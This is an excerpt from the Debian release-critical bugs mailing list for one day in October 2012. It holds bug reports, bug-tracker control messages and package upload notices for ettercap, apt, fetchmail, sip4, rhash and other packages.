anyone else can confirm it.

Andy



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691223: Patches

2012-10-25 Thread Jesse Smith
Before applying patches for bug 691107 please keep in mind a new version
of Atanks will probably be out this weekend which will address the
Options menu issue. Even with the patch some testers are still reporting
problems and we want to get those resolved upstream.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#691203: Missing B-D to ant

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 691202 + unreproducible
Bug #691202 [libswingx1-java] Missing B-D to cdbs
Added tag(s) unreproducible.
 tags 691203 + unreproducible
Bug #691203 [libswingx1-java] Missing B-D to ant
Added tag(s) unreproducible.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
691202: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691202
691203: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691203
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691223: Patches

2012-10-25 Thread Michael Gilbert
On Thu, Oct 25, 2012 at 6:21 PM, Jesse Smith  wrote:
 Before applying patches for bug 691107 please keep in mind a new version
 of Atanks will probably be out this weekend which will address the
 Options menu issue. Even with the patch some testers are still reporting
 problems and we want to get those resolved upstream.

I'm going to leave the current deferred nmu in place since it fixes an
rc issue.  If anyone has interest in the menu bug, please feel free to
upload another version after that.

Best wishes,
Mike


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691465: serious issues

2012-10-25 Thread Barak A. Pearlmutter
Package: ettercap-common
Version: 0.7.4.2-1
Severity: grave

The new upstream release, 0.7.5, makes major changes in many places.
Examination showed that a significant number of these changes fix
potential security-critical issues, like buffer overruns from
carefully crafted packets.  Since this package must run as root, and
by nature tends to process potentially-hostile network flows, these
are somewhat serious.

--Barak.
--
Barak A. Pearlmutter
 Hamilton Institute  Dept Comp Sci, NUI Maynooth, Co. Kildare, Ireland
 http://www.bcl.hamilton.ie/~barak/


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691465: marked as done (serious issues)

2012-10-25 Thread Debian Bug Tracking System
Your message dated Thu, 25 Oct 2012 23:32:36 +
with message-id e1trwui-0002rd...@franck.debian.org
and subject line Bug#691465: fixed in ettercap 1:0.7.5-1
has caused the Debian Bug report #691465,
regarding serious issues
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
691465: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691465
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: ettercap-common
Version: 0.7.4.2-1
Severity: grave

The new upstream release, 0.7.5, makes major changes in many places.
Examination showed that a significant number of these changes fix
potential security-critical issues, like buffer overruns from
carefully crafted packets.  Since this package must run as root, and
by nature tends to process potentially-hostile network flows, these
are somewhat serious.

--Barak.
--
Barak A. Pearlmutter
 Hamilton Institute  Dept Comp Sci, NUI Maynooth, Co. Kildare, Ireland
 http://www.bcl.hamilton.ie/~barak/
---End Message---
---BeginMessage---
Source: ettercap
Source-Version: 1:0.7.5-1

We believe that the bug you reported is fixed in the latest version of
ettercap, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 691...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Barak A. Pearlmutter b...@debian.org (supplier of updated ettercap package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Fri, 26 Oct 2012 00:20:00 +0100
Source: ettercap
Binary: ettercap-common ettercap-text-only ettercap-graphical
Architecture: source amd64
Version: 1:0.7.5-1
Distribution: unstable
Urgency: low
Maintainer: Barak A. Pearlmutter b...@debian.org
Changed-By: Barak A. Pearlmutter b...@debian.org
Description: 
 ettercap-common - Multipurpose sniffer/interceptor/logger for switched LAN
 ettercap-graphical - Ettercap GUI-enabled executable
 ettercap-text-only - Ettercap console-mode executable
Closes: 670840 691465
Changes: 
 ettercap (1:0.7.5-1) unstable; urgency=low
 .
   * New upstream release from new upstream team
 - switch to cmake build system
 - various fiddly fixes (closes: #691465)
   * Modify packaging scripts for new cmake build system.
   * General packaging updates.
   * Depend on menu for su-to-root in menu file (closes: #670840)
   * Misc patches, including
 - gadu-gadu plugin, so avoid removing functionality
 - spelling and man page fixes
 - desktop file and scalable icon
 - post-release upstream patch avoiding sslstrip.so promiscuous linkage
Checksums-Sha1: 
 60a4f86824ff1dc4d80b5f032c7fc6dff2fb9cbe 1589 ettercap_0.7.5-1.dsc
 def30daae3731549e3362cddb2b214f8591cd3a1 717691 ettercap_0.7.5.orig.tar.gz
 a82bc813546c739d9241baa983bc927ba8303bcf 30534 ettercap_0.7.5-1.debian.tar.gz
 06cdedd4ddae10d68e340b938655095c4b789718 393100 
ettercap-common_0.7.5-1_amd64.deb
 41efc24af7acc7a06f353d184b43b45379f811a9 183186 
ettercap-text-only_0.7.5-1_amd64.deb
 05e3669b9d258d530530aaa2016c761178e63098 235888 
ettercap-graphical_0.7.5-1_amd64.deb
Checksums-Sha256: 
 311ae79418175bcf8884a75f0090aa2a57da8f46287acf8819d3ffa1d59496e3 1589 
ettercap_0.7.5-1.dsc
 586219af5fbc33a2b20b10c8892a9e6b553268f09a0ac7df66064f1f8743ae4f 717691 
ettercap_0.7.5.orig.tar.gz
 481bbc45b82129d70031935fe8fc7bc0b202cb0f454497bdf05eca6016514677 30534 
ettercap_0.7.5-1.debian.tar.gz
 bc52d8461c7293ce0e77e9f7e14dc746ffbd6114f354356b8f6a551f3e216533 393100 
ettercap-common_0.7.5-1_amd64.deb
 78c8b348af0249652a419d1ca480de5c33e79559832024bc5a3c1bdf025869ef 183186 
ettercap-text-only_0.7.5-1_amd64.deb
 c35cd2225f5b03d9b81cab6b5d73608a7228ea511216b60491bc53dba859e68d 235888 
ettercap-graphical_0.7.5-1_amd64.deb
Files: 
 15c37071f732dd9f225e91d08885a6ec 1589 net optional ettercap_0.7.5-1.dsc
 2427e8a396b029ac7f180339b2041c1a 717691 net optional ettercap_0.7.5.orig.tar.gz
 b9cfc0dafafe9bb1668adfcbd7da6e81 30534 net optional 
ettercap_0.7.5-1.debian.tar.gz
 d427e86c61406cde9c83bb0890c2b699 393100 net optional 
ettercap-common_0.7.5-1_amd64.deb
 4e168a84ab7898d305e41aee51c9a08d 183186 net optional 
ettercap-text-only_0.7.5-1_amd64.deb
 07d43fb1005726a6036f351296d03b38 235888 net optional 

Bug#689519: apt: another instance of this bug

2012-10-25 Thread whatmeurgent
Package: apt
Version: 0.9.7.5
Followup-For: Bug #689519

Dear Maintainer,

When I ran apt-get update just now, I also received a segfault. Most (possibly 
all) of the indexing files did download. 

Following is a paste from the final lines of output, along with the error code 
Ireceived.

Ign http://security.debian.org testing/updates/main Translation-en_US
Ign http://security.debian.org testing/updates/main Translation-en
Segmentation fault
E: Problem executing scripts APT::Update::Post-Invoke-Success 'test -x 
/usr/bin/apt-show-versions || exit 0 ; apt-show-versions -i'
E: Sub-process returned an error code
# echo $PIPESTATUS
100

I then tried apt-get -t testing upgrade and got:
485 # apt-get -t testing upgrade
Segmentation faultsts... 63%
# echo $PIPESTATUS
139

I then tried apt-cache search zip. It took 18 seconds, and then also returned a 
segfault, with $PIPESTATUS 139

Same for apt-cache show zip, but it only(!) took 16 seconds. same error status


-- Package-specific info:

-- apt-config dump --

APT ;
APT::Architecture amd64;
APT::Build-Essential ;
APT::Build-Essential:: build-essential;
APT::Install-Recommends true;
APT::Install-Suggests 0;
APT::Authentication ;
APT::Authentication::TrustCDROM true;
APT::NeverAutoRemove ;
APT::NeverAutoRemove:: ^firmware-linux.*;
APT::NeverAutoRemove:: ^linux-firmware$;
APT::NeverAutoRemove:: ^linux-image.*;
APT::NeverAutoRemove:: ^kfreebsd-image.*;
APT::NeverAutoRemove:: ^linux-restricted-modules.*;
APT::NeverAutoRemove:: ^linux-ubuntu-modules-.*;
APT::NeverAutoRemove:: ^gnumach$;
APT::NeverAutoRemove:: ^gnumach-image.*;
APT::Never-MarkAuto-Sections ;
 19:50:48 up  5:05,  3 users,  load average: 0.13, 0.32, 0.29
USER TTY  FROM  LOGIN@   IDLE   JCPU   PCPU WHAT
optimum  tty7 :0   14:495:05m 28:13   0.06s /bin/sh /etc/xd
optimum  pts/0:0.0 19:211:14   0.69s  5.00s xfce4-terminal
optimum  pts/1:0.0 19:370.00s  9.92s  0.02s w
APT::Never-MarkAuto-Sections:: restricted/metapackages;
APT::Never-MarkAuto-Sections:: universe/metapackages;
APT::Never-MarkAuto-Sections:: multiverse/metapackages;
APT::Never-MarkAuto-Sections:: oldlibs;
APT::Never-MarkAuto-Sections:: restricted/oldlibs;
APT::Never-MarkAuto-Sections:: universe/oldlibs;
APT::Never-MarkAuto-Sections:: multiverse/oldlibs;
APT::Update ;
APT::Update::Pre-Invoke ;
APT::Update::Pre-Invoke:: if [ -x /usr/bin/daptup ]; then /usr/bin/daptup 
--pre; fi;
APT::Update::Post-Invoke ;
APT::Update::Post-Invoke:: if [ -x /usr/bin/daptup ]; then /usr/bin/daptup 
--post; fi;
APT::Update::Post-Invoke-Success ;
APT::Update::Post-Invoke-Success:: test -x /usr/bin/apt-show-versions || exit 
0 ; apt-show-versions -i;
APT::Update::Post-Invoke-Success:: [ ! -f /var/run/dbus/system_bus_socket ] || 
/usr/bin/dbus-send --system --dest=org.debian.apt --type=signal /org/debian/apt 
org.debian.apt.CacheChanged || true;
APT::Update::Post-Invoke-Success:: /usr/bin/test -e 
/usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service  
/usr/bin/test -S /var/run/dbus/system_bus_socket  /usr/bin/gdbus call 
--system --dest org.freedesktop.PackageKit --object-path 
/org/freedesktop/PackageKit --timeout 1 --method 
org.freedesktop.PackageKit.StateHasChanged cache-update  /dev/null; /bin/echo 
 /dev/null;
APT::Architectures ;
APT::Architectures:: amd64;
APT::Architectures:: i386;
APT::Compressor ;
APT::Compressor::. ;
APT::Compressor::.::Name .;
APT::Compressor::.::Extension ;
APT::Compressor::.::Binary ;
APT::Compressor::.::Cost 1;
APT::Compressor::gzip ;
APT::Compressor::gzip::Name gzip;
APT::Compressor::gzip::Extension .gz;
APT::Compressor::gzip::Binary gzip;
APT::Compressor::gzip::Cost 2;
APT::Compressor::gzip::CompressArg ;
APT::Compressor::gzip::CompressArg:: -9n;
APT::Compressor::gzip::UncompressArg ;
APT::Compressor::gzip::UncompressArg:: -d;
APT::Compressor::bzip2 ;
APT::Compressor::bzip2::Name bzip2;
APT::Compressor::bzip2::Extension .bz2;
APT::Compressor::bzip2::Binary bzip2;
APT::Compressor::bzip2::Cost 3;
APT::Compressor::bzip2::CompressArg ;
APT::Compressor::bzip2::CompressArg:: -9;
APT::Compressor::bzip2::UncompressArg ;
APT::Compressor::bzip2::UncompressArg:: -d;
APT::Compressor::xz ;
APT::Compressor::xz::Name xz;
APT::Compressor::xz::Extension .xz;
APT::Compressor::xz::Binary xz;
APT::Compressor::xz::Cost 4;
APT::Compressor::xz::CompressArg ;
APT::Compressor::xz::CompressArg:: -6;
APT::Compressor::xz::UncompressArg ;
APT::Compressor::xz::UncompressArg:: -d;
APT::Compressor::lzma ;
APT::Compressor::lzma::Name lzma;
APT::Compressor::lzma::Extension .lzma;
APT::Compressor::lzma::Binary xz;
APT::Compressor::lzma::Cost 5;
APT::Compressor::lzma::CompressArg ;
APT::Compressor::lzma::CompressArg:: --format=lzma;
APT::Compressor::lzma::CompressArg:: -9;
APT::Compressor::lzma::UncompressArg ;
APT::Compressor::lzma::UncompressArg:: --format=lzma;
APT::Compressor::lzma::UncompressArg:: -d;
APT::CompressorName ;
APT::CompressorExtension .;

Bug#691306: Bug #691306: iptables add 4 rules instead just one in kernel INPUT chain

2012-10-25 Thread Jan Engelhardt
On Thursday 2012-10-25 17:20, Laurence J. Lane wrote:

I'm uncertain of the issue with duplicate addresses for localhost.
I'll ask upstream if iptables should filter out duplicates.

dunno. I have no preference in this regard.

`wget` would also seem to simply iterate over all entries.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691469: fetchmail apprently uses mboxo format, which irrecoverably corrupts mail

2012-10-25 Thread Christoph Anton Mitterer
Package: fetchmail
Version: 6.3.22-1
Severity: critical
Tags: upstream
Justification: causes serious data loss


Hi.

This is basically the same as Debian bugs #690741 and #633799.
I used severity critical, as the mboxo format causes irrecoverable
mail corruption, which is unknown to most users.


The details of the problem, what happens and how it can be easily
solved are to be found in the upstream bug report.


From the Debian side I would recommned the following (analogously
to #690741 and #633799):

If ustream _shouldn't_ want to fix this (i.e. by moving to a non-corrupting
mbox format) or if it cannot be done in time for wheezy (which is likely),
we should appropriately warn our users, e.g. via:
- NEWS entry
- package description
- a debconf warning dialogoue with priority high (but Osamu Aoki has indicated
  that this may violate the Debian policy).

But even when it's fixed, I think we should use appropriate ways (NEWS file)
to warn our users that ever since, this issue has existed and their mails
are likely affected.


To get some numbers,... in my own mail archive (about 3,4 million mails)
~17000 mails are corrupted from this issue.


Best wishes,
Chris.




-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.5-trunk-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_DE.UTF-8, LC_CTYPE=en_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691469: set forwarded url

2012-10-25 Thread Christoph Anton Mitterer
forwarded 691469 
https://lists.berlios.de/pipermail/fetchmail-users/2012-October/003258.html
stop

Oh btw... I (from my side) would be fine with lowering severity to
normal again, once appropriate warnings are in place :)


Cheers,
Chris.


smime.p7s
Description: S/MIME cryptographic signature


Processed: set forwarded url

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 forwarded 691469 
 https://lists.berlios.de/pipermail/fetchmail-users/2012-October/003258.html
Bug #691469 [fetchmail] fetchmail apprently uses mboxo format, which 
irrecoverably corrupts mail
Set Bug forwarded-to-address to 
'https://lists.berlios.de/pipermail/fetchmail-users/2012-October/003258.html'.
 stop
Stopping processing here.

Please contact me if you need assistance.
-- 
691469: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691469
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691202: Bug#691203: Missing B-D to ant

2012-10-25 Thread tony mancill
On 10/25/2012 03:18 PM, Andrew Ross wrote:
 tags 691202 + unreproducible
 tags 691203 + unreproducible
 thanks
 
 I've just built this package in both stable and testing using pbuilder
 with no problems. I'm marking as unreproducible and will close unless
 anyone else can confirm it.

I am unable to reproduce the bug either.  It builds for me in clean
pbuilder chroots on squeeze, wheezy, and sid.

Cheers,
tony



signature.asc
Description: OpenPGP digital signature


Processed: your mail

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tag 665476 - patch
Bug #665476 [libsasl2-2,libsasl2-modules] libsasl2-2 - ABI change without 
changing ABI name
Removed tag(s) patch.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
665476: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=665476
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: your mail

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tag 691442 + pending
Bug #691442 [python-sip-dev,python3-sip-dev,python3-sip-dbg] python{, 
3}-sip-{dev, dbg}: copyright file missing after upgrade (policy 12.5)
Added tag(s) pending.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
691442: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691442
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691442: marked as done (python{, 3}-sip-{dev, dbg}: copyright file missing after upgrade (policy 12.5))

2012-10-25 Thread Debian Bug Tracking System
Your message dated Fri, 26 Oct 2012 04:33:56 +
with message-id e1trbck-0001w0...@franck.debian.org
and subject line Bug#691442: fixed in sip4 4.14-3
has caused the Debian Bug report #691442,
regarding python{, 3}-sip-{dev, dbg}: copyright file missing after upgrade 
(policy 12.5)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
691442: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691442
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: python-sip-dev,python3-sip-dev,python3-sip-dbg
Version: 4.14-2
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

a test with piuparts revealed that your package misses the copyright
file after an upgrade from sid to experimental, which is a violation of
Policy 12.5:
http://www.debian.org/doc/debian-policy/ch-docs.html#s-copyrightfile

After the upgrade /usr/share/doc/$PACKAGE/ is just an empty directory.

From the attached log (scroll to the bottom...):
(from 'ls -lad /u/s/d/$PKG' and 'ls -la /u/s/d/$PKG/')

  MISSING COPYRIGHT FILE: /usr/share/doc/python-sip-dev/copyright
  drwxr-xr-x 2 root root 40 Oct 23 06:09 /usr/share/doc/python-sip-dev
  total 0
  drwxr-xr-x  2 root root   40 Oct 23 06:09 .
  drwxr-xr-x 89 root root 1940 Oct 23 06:09 ..


Additional info may be available here:
http://wiki.debian.org/MissingCopyrightFile


cheers,

Andreas


python-sip-dev_4.14-2.log.gz
Description: GNU Zip compressed data
---End Message---
---BeginMessage---
Source: sip4
Source-Version: 4.14-3

We believe that the bug you reported is fixed in the latest version of
sip4, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 691...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Scott Kitterman sc...@kitterman.com (supplier of updated sip4 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Fri, 26 Oct 2012 00:03:20 -0400
Source: sip4
Binary: python-sip python-sip-dbg python-sip-dev python-sip-doc python3-sip 
python3-sip-dev python3-sip-dbg
Architecture: source i386 all
Version: 4.14-3
Distribution: experimental
Urgency: low
Maintainer: Debian Python Modules Team 
python-modules-t...@lists.alioth.debian.org
Changed-By: Scott Kitterman sc...@kitterman.com
Description: 
 python-sip - Python/C++ bindings generator runtime library
 python-sip-dbg - Python/C++ bindings generator runtime library (debug 
extension)
 python-sip-dev - Python/C++ bindings generator development files
 python-sip-doc - Python/C++ bindings generator documentation
 python3-sip - Python 3/C++ bindings generator runtime library
 python3-sip-dbg - Python 3/C++ bindings generator runtime library (debug 
extension)
 python3-sip-dev - Python 3/C++ bindings generator development files
Closes: 691442
Changes: 
 sip4 (4.14-3) experimental; urgency=low
 .
   * Fix debian/sipconfig_py3.snippet to use sys.abiflags to detect if the
 debug build is running instead of the non-existent (in python3)
 sys.pydebug
   * Add *.preinst to python-sip-dbg, python-sip-dev, python3-sip-dbg, and
 python3-sip-dev to remove any potential doc directories that are now
 symlinks (Closes: #691442)
Checksums-Sha1: 
 3c3c5ca17a51016a252be5c5ad29b9d3d070a6e8 1796 sip4_4.14-3.dsc
 ae2962a610166fea027fce9971a6933e89989cf4 18480 sip4_4.14-3.debian.tar.gz
 8dc73d752b8b21e347c61ae6f4f7d5d0c944ef1f 152992 python-sip_4.14-3_i386.deb
 422f1b71efef9a3ad569b6597d22cb894d46f082 646034 python-sip-dbg_4.14-3_i386.deb
 6a9b0ba3f7c48f399bf9c26223659c9b63c16fe6 167896 python-sip-dev_4.14-3_i386.deb
 8c5e9ef034faa45d571775c9dee4a5fd63c0c4de 84302 python3-sip_4.14-3_i386.deb
 891c93469c1cc8b9bee597346562cfb7d4cd9731 19046 python3-sip-dev_4.14-3_i386.deb
 b422980c96b4076f9fead1f89d961d2e62c99738 317300 python3-sip-dbg_4.14-3_i386.deb
 aadd25e9b38156ceb300e217bf8e5ebd6e257499 251902 python-sip-doc_4.14-3_all.deb
Checksums-Sha256: 
 17cc4b5c87a321991799d0fc12d8e8daa307abde6241d1ff2cda1036f7c07bb8 1796 
sip4_4.14-3.dsc
 46f4ea21034f6ecd2fc2a11075ca6d2d9f6cf187636fd3c82e09000c541312f6 18480 
sip4_4.14-3.debian.tar.gz
 e0c9f5721b226ea9eab93bb3952e0658f6a4cea745188a740aee8c3e26c22b49 152992 
python-sip_4.14-3_i386.deb
 

Bug#687398: Now FTBFS...?

2012-10-25 Thread Asheesh Laroia
I just tried to build my debdiff and do an NMU, and it ends with this 
message:


Finished tests in 0.001844s, 2711.3306 tests/s, 15725.7175 assertions/s.

5 tests, 29 assertions, 0 failures, 0 errors, 0 skips
make[1]: Leaving directory `/tmp/buildd/rhash-1.2.9/bindings'
/usr/bin/make -C bindings build 
LIBRHASH_INC=-I/tmp/buildd/rhash-1.2.9/debian/tmp 
LIBRHASH_LD=-Wl,--as-needed -L/tmp/buildd/rhash-1.2.9/debian/tmp 
BINDINGS=mono

make[1]: Entering directory `/tmp/buildd/rhash-1.2.9/bindings'
make -C mono
make[2]: Entering directory `/tmp/buildd/rhash-1.2.9/bindings/mono'
gmcs -target:library -define:UNIX -out:RHash.dll -debug -keyfile:RHash.snk 
AssemblyInfo.cs Bindings.cs Hasher.cs HashType.cs

make[2]: gmcs: Command not found
make[2]: *** [RHash.dll] Error 127
make[2]: Leaving directory `/tmp/buildd/rhash-1.2.9/bindings/mono'
make[1]: *** [build-mono] Error 2
make[1]: Leaving directory `/tmp/buildd/rhash-1.2.9/bindings'
make: *** [build-indep] Error 2
dpkg-buildpackage: error: debian/rules build gave error exit status 2
E: Failed autobuilding of package
I: unmounting dev/pts filesystem
I: unmounting proc filesystem
I: cleaning the build env
I: removing directory /var/cache/pbuilder/build//16252 and its 
subdirectories


...why is gmcs not findable in my pbuilder chroot? I checked, and 
mono-gmcs is still a dependency.


Not sure. Heading to bed for now.


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#689519: update: could not reproduce this

2012-10-25 Thread Baruch
A few hours ago, I reported a set of instances of this bug.

It remained reproducable until I rebooted.

I can now perform to no ill effect apt-get update and -t testing upgrade and 
all the other apt commands I had listed previously.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org